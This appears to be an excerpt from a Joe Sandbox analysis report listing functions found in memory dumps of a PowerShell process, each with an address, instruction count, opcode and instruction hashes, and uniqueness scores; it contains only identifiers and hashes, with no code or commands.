                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0751df18043c93de821b2632fe2e117e338e99a438976fc8615642b82c0e31d2
                                                            • Instruction ID: e6ffc5f9b16a714c29f0361bfb0da9da46edd6765843714e18b914f1aeb1bf10
                                                            • Opcode Fuzzy Hash: 0751df18043c93de821b2632fe2e117e338e99a438976fc8615642b82c0e31d2
                                                            • Instruction Fuzzy Hash: 5EB17E30A00B19CFCB14CF99E454A9EFBF2FF88314F18856AD845AB761D774A846CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035A56A8 Relevance: .2, Instructions: 244COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665572645.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0ec3ba9b50a7eb648b5d83a0f9f1695f051e0c75f4a11ab6c4f145849556bd7e
                                                            • Instruction ID: c43c3361ca77d5d66c8015d253bfd3e92b10b5c259402830c52091d76dc3723e
                                                            • Opcode Fuzzy Hash: 0ec3ba9b50a7eb648b5d83a0f9f1695f051e0c75f4a11ab6c4f145849556bd7e
                                                            • Instruction Fuzzy Hash: B5A17135A046198FCB04CF5CD584D9EBBF6FF8A310B2589A9E855AB361E731EC41CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035A2A60 Relevance: .2, Instructions: 238COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665572645.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0b974a36c0bc236c39a61bcf7acf10002ab6f4ed4e7955dd910bd19f6010d310
                                                            • Instruction ID: 7a52f9fa084f8d13d404acc65c8fee36608177a6e1d7275a79c77157c47f1a4f
                                                            • Opcode Fuzzy Hash: 0b974a36c0bc236c39a61bcf7acf10002ab6f4ed4e7955dd910bd19f6010d310
                                                            • Instruction Fuzzy Hash: B6B12974A00619DFDB14DF64D844B9EBBB2FF89300F1585A9E908AB350DB70A985CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035B484D Relevance: .2, Instructions: 229COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665591995.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35b0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8bc330011c871589cf3edeae25e7791c881cead7fe05f976fc13eb98ee33a2bd
                                                            • Instruction ID: bb735539a059be7489f05aac1a4b884ecd38c8640e26fd192be1fadac8986c4d
                                                            • Opcode Fuzzy Hash: 8bc330011c871589cf3edeae25e7791c881cead7fe05f976fc13eb98ee33a2bd
                                                            • Instruction Fuzzy Hash: 28B11774A00258CFDB64DF25D898BADB7B6BF48305F1485E9E40AAB362DB309D81CF10
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035B3128 Relevance: .2, Instructions: 157COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665591995.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35b0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3befec26f4eb6778eed1afdcb8f77e0fd567310b5097e9bee544c13e3056e05b
                                                            • Instruction ID: 746a54be4aaaa8d56cc497a767a072c5fcb61fc8b1ff1b65bb93e7b3c1f83e22
                                                            • Opcode Fuzzy Hash: 3befec26f4eb6778eed1afdcb8f77e0fd567310b5097e9bee544c13e3056e05b
                                                            • Instruction Fuzzy Hash: 9D518074A00249EFDB04DFA5D854BEEBBB6BF89300F188129E855A73A1DB34DD05CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035B05D0 Relevance: .1, Instructions: 137COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665591995.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35b0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f1bd9bbd582f9468fedc1b301746e8b4bb5e71c038de51e4bbdee60d8694bd7c
                                                            • Instruction ID: d434fb688796bdb002dc90f8c1b11b06f9e5b0645ac25b20f9b2efb52c5f04ec
                                                            • Opcode Fuzzy Hash: f1bd9bbd582f9468fedc1b301746e8b4bb5e71c038de51e4bbdee60d8694bd7c
                                                            • Instruction Fuzzy Hash: 90515E79A013049FC715EB78E450A9EBBF3EF89240F64856EEA09AF350DB359C01CB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035B3118 Relevance: .1, Instructions: 136COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665591995.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35b0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e43bcc44462fe3abcfd4bb5044dcc80022736787bd10f8177e4d6fc61324a587
                                                            • Instruction ID: ec49b959bfeaed4510fa9ae67da5d2225fd6c1cd485e710c9ae4059496109274
                                                            • Opcode Fuzzy Hash: e43bcc44462fe3abcfd4bb5044dcc80022736787bd10f8177e4d6fc61324a587
                                                            • Instruction Fuzzy Hash: F4517174A04298EFCF15CFA5D854AEEBFB6BF49300F188169E851A73A1DB34D905CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035B05E0 Relevance: .1, Instructions: 129COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665591995.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35b0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: aac2d66b4995ed138604d11ee87901ea0ca3d223727f0fdb0a7acb1c5a86b99c
                                                            • Instruction ID: 882de3268e93b0e428f1512002fbd680b529f55e454fd485dfd83eebfbff0cfb
                                                            • Opcode Fuzzy Hash: aac2d66b4995ed138604d11ee87901ea0ca3d223727f0fdb0a7acb1c5a86b99c
                                                            • Instruction Fuzzy Hash: C4414E79A013049FC755EB79D450A9EBBF3EF89244F60856DEA09AF350DB319C01CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035A2A12 Relevance: .1, Instructions: 126COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665572645.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 982c64111ac6e0bcdd404e2139b7b55b3eb0282fe8f9a7180b9c864a513f08af
                                                            • Instruction ID: c34cdb323a9d34cbd86ec81682a2cddc3250889250f6fb4c78f787e6d5511ca2
                                                            • Opcode Fuzzy Hash: 982c64111ac6e0bcdd404e2139b7b55b3eb0282fe8f9a7180b9c864a513f08af
                                                            • Instruction Fuzzy Hash: 73517C31A05759CFCB15CF64C854B9DBBB1FF8A300F0985EAD448AB261DB70A989CF61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035BD510 Relevance: .1, Instructions: 117COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665591995.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35b0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3fa2083d63ade1fee8b965907e8781e66461b86423a46abe45939c7f585d8fa5
                                                            • Instruction ID: 2e68b4e92a7be131cd7f9fa99b1b85d4e668e7d67d93ebcdddd86405fc88d547
                                                            • Opcode Fuzzy Hash: 3fa2083d63ade1fee8b965907e8781e66461b86423a46abe45939c7f585d8fa5
                                                            • Instruction Fuzzy Hash: E0418E35A00219DFCF44EFA4D4906EDB7B6FF84204F5085AAEA056F2A5EB35E845CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035A568E Relevance: .1, Instructions: 113COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665572645.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4fd242fdda5315b4152193de3a580ba782511ca3784b521cb8dc8cbcf169ea37
                                                            • Instruction ID: 3b965efd7dab5384a9622b9ee12a9eb7208db18e38a9d1dbf2c6e02c149d9a20
                                                            • Opcode Fuzzy Hash: 4fd242fdda5315b4152193de3a580ba782511ca3784b521cb8dc8cbcf169ea37
                                                            • Instruction Fuzzy Hash: DB415B34A00619CFCB04CF6CD584AAEBBF1FF4A211F1989A9D845EB361E7309D04CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035B0FA0 Relevance: .1, Instructions: 104COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665591995.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35b0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: aac98bf0738639afbfc50418d3475027094bee1ef99a41a31f438b16e13417cc
                                                            • Instruction ID: 4aa612e4a350fe4bce27c122bad115b9731ea735fb5131c26d55c8a8dfa79fe1
                                                            • Opcode Fuzzy Hash: aac98bf0738639afbfc50418d3475027094bee1ef99a41a31f438b16e13417cc
                                                            • Instruction Fuzzy Hash: A13133317087848FCB02CB68D8A46DABFFAEF86150718489BD444CF2B2D734991AC761
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035A88D8 Relevance: .1, Instructions: 99COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665572645.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a7977c5c78618285fccb5a22861ae872fed84073d36a1b2e0b0de0415e661c08
                                                            • Instruction ID: 0f9637b669f897fe49def9ad5dc5869c772e59a6dbfb7bbb6edeaf976caca00d
                                                            • Opcode Fuzzy Hash: a7977c5c78618285fccb5a22861ae872fed84073d36a1b2e0b0de0415e661c08
                                                            • Instruction Fuzzy Hash: D6415C70E01A19CFCB18CF59D54469EFBF1BF89300F188559D846AB761E730B946CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035A001A Relevance: .1, Instructions: 87COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665572645.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1f6044c0729a3aa9ddf1c990a5416d288b7fde8fe07688f1a84df67acf15bf62
                                                            • Instruction ID: 47920a24a089684000bc44d9a8b336c34487e89e9596d8eeae02b905b92184f8
                                                            • Opcode Fuzzy Hash: 1f6044c0729a3aa9ddf1c990a5416d288b7fde8fe07688f1a84df67acf15bf62
                                                            • Instruction Fuzzy Hash: 2D21E535B046049FDB19DBB49C606BE7BBAEFC6240F19807AD805DB7A1DE348D068B91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035BDDC0 Relevance: .1, Instructions: 80COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665591995.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35b0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1d43604bfebf7aef13e5138ab44476505ccfd49256deec031118dae6ea3d2b37
                                                            • Instruction ID: a977d1e84c7b71fa85d1b8508e10b1971052354478ffbf40dc6c9e1cdb39e0b8
                                                            • Opcode Fuzzy Hash: 1d43604bfebf7aef13e5138ab44476505ccfd49256deec031118dae6ea3d2b37
                                                            • Instruction Fuzzy Hash: AC216D797006118FC710DF69E88496AB7F6FFC86647254569E80AC7335DB30EC02CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035BDCD8 Relevance: .1, Instructions: 80COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665591995.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35b0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e244a4a0709d539a201d784285c26f99e0eb3bf9ebbb6f7e1be58f5215075b66
                                                            • Instruction ID: ae0d5d8bbc9324f299d153a23cc36fd375f15bbca9e487e920f71d2c015bc532
                                                            • Opcode Fuzzy Hash: e244a4a0709d539a201d784285c26f99e0eb3bf9ebbb6f7e1be58f5215075b66
                                                            • Instruction Fuzzy Hash: 12216D797006118FC714DF68E89496AB7F6FFC86607264569E94ACB375CB30EC02CA60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035B0D68 Relevance: .1, Instructions: 77COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665591995.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35b0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 283e0df964266793a6a49e7cf61442595b0733ae26ed3766715c9c5f058c6d19
                                                            • Instruction ID: acc112fe3d8aedf1883b2dfd02df1603942777601c322808432a4ecc1abad893
                                                            • Opcode Fuzzy Hash: 283e0df964266793a6a49e7cf61442595b0733ae26ed3766715c9c5f058c6d19
                                                            • Instruction Fuzzy Hash: 3911592A7083445FDB04DBA9AC649D6BBEAFF8116431984AFD104CB7F2E724EC028391
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035A22C8 Relevance: .1, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665572645.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4a024f463075a07730c3fe0f10f60654cfb0ec457831dd5b89446c169a3d600c
                                                            • Instruction ID: 5e2888e07dcd89ef53703ec5bbec0b44dfb500a811d8bcac32ce87c2b475b909
                                                            • Opcode Fuzzy Hash: 4a024f463075a07730c3fe0f10f60654cfb0ec457831dd5b89446c169a3d600c
                                                            • Instruction Fuzzy Hash: CD116DB5700A148FC714DB59E984A6EB7B9FF89625B10496AE90687770DB70EC01CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035A26A8 Relevance: .1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665572645.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 411c5fcaaa992122ee8408ad6a935963d3b703a7f10c0b9bdb5d419c038193d8
                                                            • Instruction ID: 6af7cfa7cca6e2a4ab34c11a2da1ecb80de02a16565bbf9034db5f219eda7be4
                                                            • Opcode Fuzzy Hash: 411c5fcaaa992122ee8408ad6a935963d3b703a7f10c0b9bdb5d419c038193d8
                                                            • Instruction Fuzzy Hash: 2A216735A00209CFDF18DFA8E9197EEBBB1BB4C316F081529D402B7294DBB54A41DBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035A349D Relevance: .1, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665572645.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 971344fb9646f0406c4a3273e51a7768bd48be5f6dee589fd339da7b5887cd65
                                                            • Instruction ID: 95aab631a35781f049553620359ef614ae3e041ab9e1c7d28b968f073bcb04b5
                                                            • Opcode Fuzzy Hash: 971344fb9646f0406c4a3273e51a7768bd48be5f6dee589fd339da7b5887cd65
                                                            • Instruction Fuzzy Hash: 90112674E00B1A8BDB10CB55E854B9DFB72BF85214F158685D40CBB650EB70AAC9CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035A8478 Relevance: .1, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665572645.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 224ad4cf910d9d2d137591d326e3d411bb2f6db27bf5abcf9e5847b63fb3acb8
                                                            • Instruction ID: d41062aa2ebe50589504590d1ae4962962afaf11342751b8d604e7e27e9b1006
                                                            • Opcode Fuzzy Hash: 224ad4cf910d9d2d137591d326e3d411bb2f6db27bf5abcf9e5847b63fb3acb8
                                                            • Instruction Fuzzy Hash: 11115B75A00504DFCB04DF68E494A9EBBB2FF4C711F118469E912AB3A0CB75AC40CFA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035A2699 Relevance: .0, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665572645.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 96b6b04500b7b1bc85ecbde62ed5fe019360f1a58cfcfdff689e78a8e9edf5af
                                                            • Instruction ID: b124d2e3415da6a23122a13c29cb0c9921a1f9ec1d96d3d7104bffc38e79aa53
                                                            • Opcode Fuzzy Hash: 96b6b04500b7b1bc85ecbde62ed5fe019360f1a58cfcfdff689e78a8e9edf5af
                                                            • Instruction Fuzzy Hash: BC119E35A002099BDB18DF98D8187EEBBB1BF8C315F08152DD801B77A4CB715941CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035A8488 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665572645.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 279ecf89ab02945ba33fb07ead984db455e976efb0847576cc3a8c6889e877b6
                                                            • Instruction ID: 231f60c16ffc8a9fe5f1859469746034cd5345da1b7200cb92d5287c3d4d346f
                                                            • Opcode Fuzzy Hash: 279ecf89ab02945ba33fb07ead984db455e976efb0847576cc3a8c6889e877b6
                                                            • Instruction Fuzzy Hash: 7C115E75A00604DFCB04DF68D454A9EBBB6EF8D711F108069E912AB3A1CB75AC40CFA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035BD480 Relevance: .0, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665591995.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35b0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: deecc658e2867cb739cf4b2291c9aac58b3afb2b22d19538318e2b75140f2f35
                                                            • Instruction ID: 1df0c250001bd8670c62e96c7944f9932986a851d526353897b328235f0dc84a
                                                            • Opcode Fuzzy Hash: deecc658e2867cb739cf4b2291c9aac58b3afb2b22d19538318e2b75140f2f35
                                                            • Instruction Fuzzy Hash: 450142322002904BCB069B24A82455ABBFAAEC226571940AAD805CB251CF20DC07C3A5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035A7428 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665572645.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f024a7a4db446f7b4ebb930a1735058647482ede671db067e7af613004bc994a
                                                            • Instruction ID: 0cb2e768e44a01f1be377378d375cf1502cd50a77c226f25c890844518e0c9b3
                                                            • Opcode Fuzzy Hash: f024a7a4db446f7b4ebb930a1735058647482ede671db067e7af613004bc994a
                                                            • Instruction Fuzzy Hash: D3F0AF39A002099BDB24DB68E919BEFBFB6BF89310F080529D445B3760CBB55901D7D1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035A22B8 Relevance: .0, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665572645.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2430fd02f3b4c125b5062e1e69f416410cb20f25b61309758e5ff88438621e58
                                                            • Instruction ID: 591371e62b14291ddd6275790457fe86ff2df72aee03a2b2d68ac875a91dd74b
                                                            • Opcode Fuzzy Hash: 2430fd02f3b4c125b5062e1e69f416410cb20f25b61309758e5ff88438621e58
                                                            • Instruction Fuzzy Hash: 00F0A0B5B186645FC705C658EC94AAE7FBCFF8A521B1501ABE105C7762C6614800C761
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035B405D Relevance: .0, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665591995.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35b0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d4f9eb5d45ab3860a9e4bcf77d40efaea77a05c18bc400d736a1f752be6fe99d
                                                            • Instruction ID: 15beaa7af6aea8635a688e357bf2f05a4c9ae0f2710e7bf259f6daecd0af90ef
                                                            • Opcode Fuzzy Hash: d4f9eb5d45ab3860a9e4bcf77d40efaea77a05c18bc400d736a1f752be6fe99d
                                                            • Instruction Fuzzy Hash: C4F03C75A0025CEFDF64CF66E880BEDB7B6BB84315F1481A6E50497261DB348995CF40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035B4066 Relevance: .0, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665591995.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35b0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d4f9eb5d45ab3860a9e4bcf77d40efaea77a05c18bc400d736a1f752be6fe99d
                                                            • Instruction ID: 15beaa7af6aea8635a688e357bf2f05a4c9ae0f2710e7bf259f6daecd0af90ef
                                                            • Opcode Fuzzy Hash: d4f9eb5d45ab3860a9e4bcf77d40efaea77a05c18bc400d736a1f752be6fe99d
                                                            • Instruction Fuzzy Hash: C4F03C75A0025CEFDF64CF66E880BEDB7B6BB84315F1481A6E50497261DB348995CF40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035B201A Relevance: .0, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665591995.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35b0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 16a761052093c6ae99c2c8157975fc91ed2948aa8156e9248fb8a5ef487b7f9c
                                                            • Instruction ID: 9fcf8c7198c346fc774612000241da807b509b8a1b4599dc31376621d7f89b34
                                                            • Opcode Fuzzy Hash: 16a761052093c6ae99c2c8157975fc91ed2948aa8156e9248fb8a5ef487b7f9c
                                                            • Instruction Fuzzy Hash: 5BF0393970020DCFDB11CF94E8848EEB3B2FB48310B148869E91A9B261C731E815CF20
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035A8F68 Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665572645.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 10327aff7b66e7048448b5a8188465f9b0b117333ccc4cc47d6bb417214f19d0
                                                            • Instruction ID: 305719cd525d48d51c75885475b497618fbb64053d6756dfdd5514bf96c8f0f5
                                                            • Opcode Fuzzy Hash: 10327aff7b66e7048448b5a8188465f9b0b117333ccc4cc47d6bb417214f19d0
                                                            • Instruction Fuzzy Hash: C8E0CD31224B5517D72492ADF0043B9BBCD5B46164F0C097DE94DC6A95E974E8518391
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 035B2C60 Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.665591995.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35b0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a13846abaa90c3a841e968a68dfcdaea949721ec17390d47362637ed030aa850
                                                            • Instruction ID: fd3a7a1b0a4344d9ec9333f9d336776ef4b2ccf2f9c63a288dabdce2136eff49
                                                            • Opcode Fuzzy Hash: a13846abaa90c3a841e968a68dfcdaea949721ec17390d47362637ed030aa850
